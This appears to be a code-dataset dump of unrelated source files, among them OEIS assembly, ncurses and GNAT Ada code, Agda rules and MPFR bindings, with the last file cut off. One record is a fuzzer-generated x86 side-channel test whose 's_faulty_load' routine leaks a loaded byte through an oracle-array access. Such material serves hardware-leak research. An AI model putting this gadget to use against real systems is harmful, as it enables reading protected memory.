max_stars_repo_path
stringlengths
4
261
max_stars_repo_name
stringlengths
6
106
max_stars_count
int64
0
38.8k
id
stringlengths
1
6
text
stringlengths
7
1.05M
programs/oeis/116/A116556.asm
neoneye/loda
22
1687
<filename>programs/oeis/116/A116556.asm ; A116556: a(n) = 2*a(n-1) + 2*a(n-2), a(0)=0, a(1)=4. ; 0,4,8,24,64,176,480,1312,3584,9792,26752,73088,199680,545536,1490432,4071936,11124736,30393344,83036160,226859008,619790336,1693298688,4626178048,12638953472,34530263040,94338433024,257737392128,704151650304,1923778084864,5255859470336,14359275110400,39230269161472,107179088543744,292818715410432,799995607908352,2185628646637568,5971248509091840,16313754311458816,44570005641101312,121767519905120256,332675051092443136,908885141995126784,2483120386175139840,6784011056340533248,18534262885031346176,50636547882743758848,138341621535550210048,377956338836587937792,1032595920744276295680,2821104519161728466944,7707400879812009525248,21057010797947475984384,57528823355518971019264,157171668306932894007296,429400983324903730053120,1173145303263673248120832,3205092573177153956347904,8756475752881654408937472,23923136652117616730570752,65359224809998542279016448,178564722924232318019174400,487847895468461720596381696,1332825236785388077231112192,3641346264507699595654987776,9948343002586175345772199936,27179378534187749882854375424,74255443073547850457253150720,202869643215471200680215052288,554250172578038102274936406016,1514239631587018605910302916608,4136979608330113416370478645248,11302438479834264044561563123712,30878836176328754921864083537920,84362549312326037932851293323264,230482770977309585709430753722368,629690640579271247284564094091264,1720346823113161665987989695627264,4700074927384865826545107579437056,12840843500996054985066194550128640,35081836856761841623222604259131392,95845360715515793216577597618520064,261854395144555269679600403755302912,715399511720142125792356002747645952 mov $3,4 lpb $0 sub $0,1 mul $1,2 mov $2,$1 add $1,$3 mov $3,$2 lpe mov $0,$1
external/ncurses/Ada95/samples/ncurses2-slk_test.adb
Ar0gon/arogon
6
20239
<reponame>Ar0gon/arogon ------------------------------------------------------------------------------ -- -- -- GNAT ncurses Binding Samples -- -- -- -- ncurses -- -- -- -- B O D Y -- -- -- ------------------------------------------------------------------------------ -- Copyright (c) 2000-2011,2018 Free Software Foundation, Inc. -- -- -- -- Permission is hereby granted, free of charge, to any person obtaining a -- -- copy of this software and associated documentation files (the -- -- "Software"), to deal in the Software without restriction, including -- -- without limitation the rights to use, copy, modify, merge, publish, -- -- distribute, distribute with modifications, sublicense, and/or sell -- -- copies of the Software, and to permit persons to whom the Software is -- -- furnished to do so, subject to the following conditions: -- -- -- -- The above copyright notice and this permission notice shall be included -- -- in all copies or substantial portions of the Software. -- -- -- -- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS -- -- OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -- -- MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -- -- IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, -- -- DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR -- -- OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR -- -- THE USE OR OTHER DEALINGS IN THE SOFTWARE. -- -- -- -- Except as contained in this notice, the name(s) of the above copyright -- -- holders shall not be used in advertising or otherwise to promote the -- -- sale, use or other dealings in this Software without prior written -- -- authorization. -- ------------------------------------------------------------------------------ -- Author: <NAME> <<EMAIL>> 2000 -- Version Control -- $Revision: 1.10 $ -- $Date: 2018/07/07 23:30:32 $ -- Binding Version 01.00 ------------------------------------------------------------------------------ with ncurses2.util; use ncurses2.util; with Terminal_Interface.Curses; use Terminal_Interface.Curses; with Ada.Strings.Unbounded; with Interfaces.C; with Terminal_Interface.Curses.Aux; procedure ncurses2.slk_test is procedure myGet (Win : Window := Standard_Window; Str : out Ada.Strings.Unbounded.Unbounded_String; Len : Integer := -1); procedure myGet (Win : Window := Standard_Window; Str : out Ada.Strings.Unbounded.Unbounded_String; Len : Integer := -1) is use Ada.Strings.Unbounded; use Interfaces.C; use Terminal_Interface.Curses.Aux; function Wgetnstr (Win : Window; Str : char_array; Len : int) return int; pragma Import (C, Wgetnstr, "wgetnstr"); -- FIXME: how to construct "(Len > 0) ? Len : 80"? Ask : constant Interfaces.C.size_t := Interfaces.C.size_t'Val (Len + 80); Txt : char_array (0 .. Ask); begin Txt (0) := Interfaces.C.char'First; if Wgetnstr (Win, Txt, Txt'Length) = Curses_Err then raise Curses_Exception; end if; Str := To_Unbounded_String (To_Ada (Txt, True)); end myGet; use Ada.Strings.Unbounded; c : Key_Code; buf : Unbounded_String; c2 : Character; fmt : Label_Justification := Centered; tmp : Integer; begin c := CTRL ('l'); loop Move_Cursor (Line => 0, Column => 0); c2 := Code_To_Char (c); case c2 is when Character'Val (Character'Pos ('l') mod 16#20#) => -- CTRL('l') Erase; Switch_Character_Attribute (Attr => (Bold_Character => True, others => False)); Add (Line => 0, Column => 20, Str => "Soft Key Exerciser"); Switch_Character_Attribute (On => False, Attr => (Bold_Character => True, others => False)); Move_Cursor (Line => 2, Column => 0); P ("Available commands are:"); P (""); P ("^L -- refresh screen"); P ("a -- activate or restore soft keys"); P ("d -- disable soft keys"); P ("c -- set centered format for labels"); P ("l -- set left-justified format for labels"); P ("r -- set right-justified format for labels"); P ("[12345678] -- set label; labels are numbered 1 through 8"); P ("e -- erase stdscr (should not erase labels)"); P ("s -- test scrolling of shortened screen"); P ("x, q -- return to main menu"); P (""); P ("Note: if activating the soft keys causes your terminal to"); P ("scroll up one line, your terminal auto-scrolls when anything"); P ("is written to the last screen position. The ncurses code"); P ("does not yet handle this gracefully."); Refresh; Restore_Soft_Label_Keys; when 'a' => Restore_Soft_Label_Keys; when 'e' => Clear; when 's' => Add (Line => 20, Column => 0, Str => "Press Q to stop the scrolling-test: "); loop c := Getchar; c2 := Code_To_Char (c); exit when c2 = 'Q'; -- c = ERR? -- TODO when c is not a character (arrow key) -- the behavior is different from the C version. Add (Ch => c2); end loop; when 'd' => Clear_Soft_Label_Keys; when 'l' => fmt := Left; when 'c' => fmt := Centered; when 'r' => fmt := Right; when '1' | '2' | '3' | '4' | '5' | '6' | '7' | '8' => Add (Line => 20, Column => 0, Str => "Please enter the label value: "); Set_Echo_Mode (SwitchOn => True); myGet (Str => buf); Set_Echo_Mode (SwitchOn => False); tmp := ctoi (c2); Set_Soft_Label_Key (Label_Number (tmp), To_String (buf), fmt); Refresh_Soft_Label_Keys; Move_Cursor (Line => 20, Column => 0); Clear_To_End_Of_Line; when 'x' | 'q' => exit; -- the C version needed a goto, ha ha -- breaks exit the case not the loop because fall-through -- happens in C! when others => Beep; end case; c := Getchar; -- TODO exit when c = EOF end loop; Erase; End_Windows; end ncurses2.slk_test;
bb-runtimes/runtimes/ravenscar-full-stm32g474/gnat/g-debuti.adb
JCGobbi/Nucleo-STM32G474RE
0
20219
------------------------------------------------------------------------------ -- -- -- GNAT LIBRARY COMPONENTS -- -- -- -- G N A T . D E B U G _ U T I L I T I E S -- -- -- -- B o d y -- -- -- -- Copyright (C) 1997-2021, AdaCore -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- -- -- -- -- -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ with System; use System; with System.Storage_Elements; use System.Storage_Elements; package body GNAT.Debug_Utilities is H : constant array (0 .. 15) of Character := "0123456789ABCDEF"; -- Table of hex digits ----------- -- Image -- ----------- -- Address case function Image (A : Address) return Image_String is S : Image_String; P : Natural; N : Integer_Address; U : Natural := 0; begin S (S'Last) := '#'; P := Address_Image_Length - 1; N := To_Integer (A); while P > 3 loop if U = 4 then S (P) := '_'; P := P - 1; U := 1; else U := U + 1; end if; S (P) := H (Integer (N mod 16)); P := P - 1; N := N / 16; end loop; S (1 .. 3) := "16#"; return S; end Image; ----------- -- Image -- ----------- -- String case function Image (S : String) return String is W : String (1 .. 2 * S'Length + 2); P : Positive := 1; begin W (1) := '"'; for J in S'Range loop if S (J) = '"' then P := P + 1; W (P) := '"'; end if; P := P + 1; W (P) := S (J); end loop; P := P + 1; W (P) := '"'; return W (1 .. P); end Image; ------------- -- Image_C -- ------------- function Image_C (A : Address) return Image_C_String is S : Image_C_String; N : Integer_Address := To_Integer (A); begin for P in reverse 3 .. S'Last loop S (P) := H (Integer (N mod 16)); N := N / 16; end loop; S (1 .. 2) := "0x"; return S; end Image_C; ----------- -- Value -- ----------- function Value (S : String) return System.Address is Base : Integer_Address := 10; Res : Integer_Address := 0; Last : Natural := S'Last; C : Character; N : Integer_Address; begin -- Skip final Ada 95 base character if S (Last) = '#' or else S (Last) = ':' then Last := Last - 1; end if; -- Loop through characters for J in S'First .. Last loop C := S (J); -- C format hex constant if C = 'x' then if Res /= 0 then raise Constraint_Error; end if; Base := 16; -- Ada form based literal elsif C = '#' or else C = ':' then Base := Res; Res := 0; -- Ignore all underlines elsif C = '_' then null; -- Otherwise must have digit else if C in '0' .. '9' then N := Character'Pos (C) - Character'Pos ('0'); elsif C in 'A' .. 'F' then N := Character'Pos (C) - (Character'Pos ('A') - 10); elsif C in 'a' .. 'f' then N := Character'Pos (C) - (Character'Pos ('a') - 10); else raise Constraint_Error; end if; if N >= Base then raise Constraint_Error; else Res := Res * Base + N; end if; end if; end loop; return To_Address (Res); end Value; end GNAT.Debug_Utilities;
src/CF/Contexts/Rewriting.agda
ajrouvoet/jvm.agda
6
13772
<filename>src/CF/Contexts/Rewriting.agda {-# OPTIONS --rewriting #-} module CF.Contexts.Rewriting where open import Data.List open import Data.List.Properties open import Agda.Builtin.Equality.Rewrite open import Relation.Binary.PropositionalEquality open import CF.Types ++-assoc-← : ∀ (xs ys zs : List Ty) → xs ++ (ys ++ zs) ≡ (xs ++ ys) ++ zs ++-assoc-← = λ x y z → sym (++-assoc x y z) ++-identityʳ-← : ∀ (xs : List Ty) → xs ++ [] ≡ xs ++-identityʳ-← xs = ++-identityʳ xs {-# REWRITE ++-assoc-← #-} {-# REWRITE ++-identityʳ-← #-}
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0xca.log_21829_882.asm
ljhsiun2/medusa
9
86878
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r12 push %r13 push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x1ea31, %rsi lea addresses_normal_ht+0x2921, %rdi nop nop nop nop nop add %r12, %r12 mov $6, %rcx rep movsq xor %r13, %r13 lea addresses_UC_ht+0xb319, %rsi lea addresses_D_ht+0x14319, %rdi nop nop nop dec %rbx mov $84, %rcx rep movsw nop xor %r12, %r12 pop %rsi pop %rdi pop %rcx pop %rbx pop %r13 pop %r12 ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r15 push %r9 push %rdi push %rdx // Store lea addresses_PSE+0x9739, %r15 nop cmp $60722, %rdx mov $0x5152535455565758, %rdi movq %rdi, %xmm5 movups %xmm5, (%r15) add $48947, %r11 // Faulty Load lea addresses_WC+0xab19, %r9 sub $61954, %r11 movb (%r9), %dl lea oracles, %rdi and $0xff, %rdx shlq $12, %rdx mov (%rdi,%rdx,1), %rdx pop %rdx pop %rdi pop %r9 pop %r15 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_PSE'}} [Faulty Load] {'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 1, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'congruent': 3, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_normal_ht'}} {'src': {'congruent': 11, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 11, 'same': False, 'type': 'addresses_D_ht'}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
source/mpfr-root_fr.ads
ytomino/gmp-ada
4
5152
<filename>source/mpfr-root_fr.ads private with Ada.Finalization; package MPFR.Root_FR is pragma Preelaborate; type MP_Float (Precision : MPFR.Precision) is private; function To_MP_Float ( X : Long_Long_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function To_Long_Long_Float (X : MP_Float; Rounding : MPFR.Rounding) return Long_Long_Float; function Image ( Value : MP_Float; Base : Number_Base := 10; Rounding : MPFR.Rounding) return String; function Value ( Image : String; Base : Number_Base := 10; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function "=" (Left, Right : MP_Float) return Boolean; function "<" (Left, Right : MP_Float) return Boolean; function ">" (Left, Right : MP_Float) return Boolean; function "<=" (Left, Right : MP_Float) return Boolean; function ">=" (Left, Right : MP_Float) return Boolean; function Copy ( -- Positive Right : MP_Float; Precision : MPFR.Precision := Default_Precision; Rounding : MPFR.Rounding := Default_Rounding) return MP_Float; function Negative ( Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Add ( Left, Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Add ( Left : MP_Float; Right : Long_Long_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Add ( Left : Long_Long_Float; Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Subtract ( Left, Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Subtract ( Left : MP_Float; Right : Long_Long_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Subtract ( Left : Long_Long_Float; Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Multiply ( Left, Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Multiply ( Left : MP_Float; Right : Long_Long_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Multiply ( Left : Long_Long_Float; Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Divide ( Left, Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Divide ( Left : MP_Float; Right : Long_Long_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Divide ( Left : Long_Long_Float; Right : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Power ( Left : MP_Float; Right : Integer; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function Sqrt ( X : MP_Float; Precision : MPFR.Precision; Rounding : MPFR.Rounding) return MP_Float; function NaN (Precision : MPFR.Precision) return MP_Float; function Infinity (Precision : MPFR.Precision) return MP_Float; private package Controlled is type MP_Float is private; function Create (Precision : MPFR.Precision) return MP_Float; function Reference (Item : in out Root_FR.MP_Float) return not null access C.mpfr.mpfr_struct; function Constant_Reference (Item : Root_FR.MP_Float) return not null access constant C.mpfr.mpfr_struct; pragma Inline (Reference); pragma Inline (Constant_Reference); private type MP_Float is new Ada.Finalization.Controlled with record Raw : aliased C.mpfr.mpfr_t := (others => (others => <>)); end record; overriding procedure Initialize (Object : in out MP_Float); overriding procedure Adjust (Object : in out MP_Float); overriding procedure Finalize (Object : in out MP_Float); end Controlled; -- [gcc-4.8/4.9/5.0] derivation with discriminants makes many problems. type MP_Float (Precision : MPFR.Precision) is record Data : Controlled.MP_Float := Controlled.Create (Precision); end record; end MPFR.Root_FR;
programs/oeis/017/A017055.asm
karttu/loda
1
241611
; A017055: a(n) = (7*n + 6)^3. ; 216,2197,8000,19683,39304,68921,110592,166375,238328,328509,438976,571787,729000,912673,1124864,1367631,1643032,1953125,2299968,2685619,3112136,3581577,4096000,4657463,5268024,5929741,6644672,7414875,8242408,9129329,10077696,11089567,12167000,13312053,14526784,15813251,17173512,18609625,20123648,21717639,23393656,25153757,27000000,28934443,30959144,33076161,35287552,37595375,40001688,42508549,45118016,47832147,50653000,53582633,56623104,59776471,63044792,66430125,69934528,73560059,77308776,81182737,85184000,89314623,93576664,97972181,102503232,107171875,111980168,116930169,122023936,127263527,132651000,138188413,143877824,149721291,155720872,161878625,168196608,174676879,181321496,188132517,195112000,202262003,209584584,217081801,224755712,232608375,240641848,248858189,257259456,265847707,274625000,283593393,292754944,302111711,311665752,321419125,331373888,341532099,351895816,362467097,373248000,384240583,395446904,406869021,418508992,430368875,442450728,454756609,467288576,480048687,493039000,506261573,519718464,533411731,547343432,561515625,575930368,590589719,605495736,620650477,636056000,651714363,667627624,683797841,700227072,716917375,733870808,751089429,768575296,786330467,804357000,822656953,841232384,860085351,879217912,898632125,918330048,938313739,958585256,979146657,1000000000,1021147343,1042590744,1064332261,1086373952,1108717875,1131366088,1154320649,1177583616,1201157047,1225043000,1249243533,1273760704,1298596571,1323753192,1349232625,1375036928,1401168159,1427628376,1454419637,1481544000,1509003523,1536800264,1564936281,1593413632,1622234375,1651400568,1680914269,1710777536,1740992427,1771561000,1802485313,1833767424,1865409391,1897413272,1929781125,1962515008,1995616979,2029089096,2062933417,2097152000,2131746903,2166720184,2202073901,2237810112,2273930875,2310438248,2347334289,2384621056,2422300607,2460375000,2498846293,2537716544,2576987811,2616662152,2656741625,2697228288,2738124199,2779431416,2821151997,2863288000,2905841483,2948814504,2992209121,3036027392,3080271375,3124943128,3170044709,3215578176,3261545587,3307949000,3354790473,3402072064,3449795831,3497963832,3546578125,3595640768,3645153819,3695119336,3745539377,3796416000,3847751263,3899547224,3951805941,4004529472,4057719875,4111379208,4165509529,4220112896,4275191367,4330747000,4386781853,4443297984,4500297451,4557782312,4615754625,4674216448,4733169839,4792616856,4852559557,4913000000,4973940243,5035382344,5097328361,5159780352,5222740375,5286210488,5350192749 mul $0,7 add $0,6 pow $0,3 mov $1,$0
oeis/242/A242563.asm
neoneye/loda-programs
11
102689
<gh_stars>10-100 ; A242563: a(n) = 2*a(n-1) - a(n-3) + 2*a(n-4), a(0)=a(1)=0, a(2)=2, a(3)=3. ; 0,0,2,3,6,10,21,42,86,171,342,682,1365,2730,5462,10923,21846,43690,87381,174762,349526,699051,1398102,2796202,5592405,11184810,22369622,44739243,89478486,178956970,357913941,715827882,1431655766,2863311531,5726623062,11453246122,22906492245,45812984490,91625968982,183251937963,366503875926,733007751850,1466015503701,2932031007402,5864062014806,11728124029611,23456248059222,46912496118442,93824992236885,187649984473770,375299968947542,750599937895083,1501199875790166,3002399751580330 mov $5,2 mov $6,$0 lpb $5 mov $0,$6 mov $3,0 sub $5,1 add $0,$5 sub $0,1 lpb $0 sub $0,2 mov $2,$0 max $2,0 seq $2,130752 ; Binomial transform of periodic sequence (2, 3, 1). add $3,$2 lpe mov $4,$5 mul $4,$3 add $1,$4 mov $7,$3 lpe min $6,1 mul $6,$7 sub $1,$6 mov $0,$1
src/Data/Fin/Substitution/Extra.agda
sstucki/f-omega-int-agda
12
921
<gh_stars>10-100 ------------------------------------------------------------------------ -- Extra definitions related to simultaneous substitutions ------------------------------------------------------------------------ {-# OPTIONS --safe --without-K #-} module Data.Fin.Substitution.Extra where open import Data.Fin using (Fin) open import Data.Fin.Substitution open import Data.Nat using (ℕ; zero; suc; _+_) open import Data.Vec using (_∷_; map) open import Level using (_⊔_) renaming (zero to lzero; suc to lsuc) open import Relation.Unary using (Pred) -- Extension of substitutions and iterated weakening. record Extension {ℓ} (T : Pred ℕ ℓ) : Set ℓ where infixr 5 _/∷_ field weaken : ∀ {n} → T n → T (suc n) -- Weakens Ts. -- Iterated weakening of Ts. weaken⋆ : ∀ m {n} → T n → T (m + n) weaken⋆ zero t = t weaken⋆ (suc m) t = weaken (weaken⋆ m t) -- Extension. -- -- The extension operation t /∷ ρ takes a substitution ρ and extends -- it with a term t for an additional free variable. It is a -- generalization of the lifting substitution ρ ↑ = var zero /∷ ρ -- where the term for the additional free variable may be something -- other than var zero. Note that the term t must itself admit an -- additional free variable so that the resulting substitution t /∷ -- ρ has an extended domain *and* codomain. This is in contrast to -- t ∷ ρ where the codomain has no additional free variables. -- I.e. given (ρ : Sub T m n) we have -- -- t ∷ ρ : Sub T (1 + m) m for t : T m -- u /∷ ρ : Sub T (1 + m) (1 + m) for u : T (1 + m) _/∷_ : ∀ {m n} → T (suc n) → Sub T m n → Sub T (suc m) (suc n) t /∷ ρ = t ∷ map weaken ρ -- A helper module for unpacking an instance of the Simple record -- together with the extra operations from the Extension module (as if -- Simple contained an instance of Extension). module SimpleExt {ℓ} {T : Pred ℕ ℓ} (simple : Simple T) where open Simple simple public extension : Extension T extension = record { weaken = weaken } open Extension extension public hiding (weaken) -- T₂-substitutions in term-like T₁ record TermLikeSubst {ℓ} (T₁ : Pred ℕ ℓ) (T₂ : ℕ → Set) : Set (lsuc (ℓ ⊔ lzero)) where field app : ∀ {T₃} → Lift T₃ T₂ → ∀ {m n} → T₁ m → Sub T₃ m n → T₁ n termSubst : TermSubst T₂ open TermSubst termSubst public hiding (app; var; weaken; _/Var_; _/_; _/✶_) termApplication : Application T₁ T₂ termApplication = record { _/_ = app termLift } varApplication : Application T₁ Fin varApplication = record { _/_ = app varLift } open Application termApplication public using (_/_; _/✶_) open Application varApplication public using () renaming (_/_ to _/Var_) -- Weakening of T₁s. weaken : ∀ {n} → T₁ n → T₁ (suc n) weaken t = t /Var VarSubst.wk
libsrc/math/mbf32/c/sccz80/l_f32_add.asm
ahjelm/z88dk
640
26392
<reponame>ahjelm/z88dk SECTION code_fp_mbf32 PUBLIC l_f32_add EXTERN ___mbf32_setup_arith EXTERN ___mbf32_FPADD EXTERN ___mbf32_return EXTERN msbios l_f32_add: call ___mbf32_setup_arith IF __CPU_INTEL__ || __CPU_GBZ80__ call ___mbf32_FPADD ELSE ld ix,___mbf32_FPADD call msbios ENDIF jp ___mbf32_return
alloy4fun_models/trashltl/models/11/gDLM4xqZZCmNs577N.als
Kaixi26/org.alloytools.alloy
0
4247
open main pred idgDLM4xqZZCmNs577N_prop12 { always (all f:File | eventually f in Trash since some (f& Trash) ) } pred __repair { idgDLM4xqZZCmNs577N_prop12 } check __repair { idgDLM4xqZZCmNs577N_prop12 <=> prop12o }
tests/R/srl.asm
madhav-datt/mmcpu
0
80113
main: nor $s0, $0, $0 srl $s1, $s0, 2 srl $s2, $s0, 4
libsrc/_DEVELOPMENT/stdlib/c/sdcc_iy/atol_fastcall.asm
jpoikela/z88dk
640
162755
; long atol_fastcall(const char *buf) SECTION code_clib SECTION code_stdlib PUBLIC _atol_fastcall EXTERN asm_atol defc _atol_fastcall = asm_atol
source/web/tools/a2js/webapi/xhr/webapi-xhr-requests.ads
svn2github/matreshka
24
1407
------------------------------------------------------------------------------ -- -- -- Matreshka Project -- -- -- -- Web Framework -- -- -- -- Web API Definition -- -- -- ------------------------------------------------------------------------------ -- -- -- Copyright © 2016, <NAME> <<EMAIL>> -- -- All rights reserved. -- -- -- -- Redistribution and use in source and binary forms, with or without -- -- modification, are permitted provided that the following conditions -- -- are met: -- -- -- -- * Redistributions of source code must retain the above copyright -- -- notice, this list of conditions and the following disclaimer. -- -- -- -- * Redistributions in binary form must reproduce the above copyright -- -- notice, this list of conditions and the following disclaimer in the -- -- documentation and/or other materials provided with the distribution. -- -- -- -- * Neither the name of the <NAME>, IE nor the names of its -- -- contributors may be used to endorse or promote products derived from -- -- this software without specific prior written permission. -- -- -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -- -- "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -- -- LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -- -- A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -- -- HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -- -- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED -- -- TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -- -- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -- -- LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -- -- NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -- -- SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- -- ------------------------------------------------------------------------------ -- $Revision$ $Date$ ------------------------------------------------------------------------------ with WebAPI.DOM.Documents; with WebAPI.DOM.Events; with WebAPI.XHR.Event_Targets; with WebAPI.XHR.Form_Datas; package WebAPI.XHR.Requests is pragma Preelaborate; type XML_Http_Request is limited new WebAPI.XHR.Event_Targets.Event_Target with private; -- The following is the event handler (and its corresponding event handler -- event type) that must be supported as attribute solely by the -- XMLHttpRequest object: -- -- * "readystatechange" type XML_Http_Request_Access is access all XML_Http_Request; subtype State is Natural range 0 .. 4; not overriding function Get_Ready_State (Self : not null access constant XML_Http_Request) return State with Import => True, Convention => 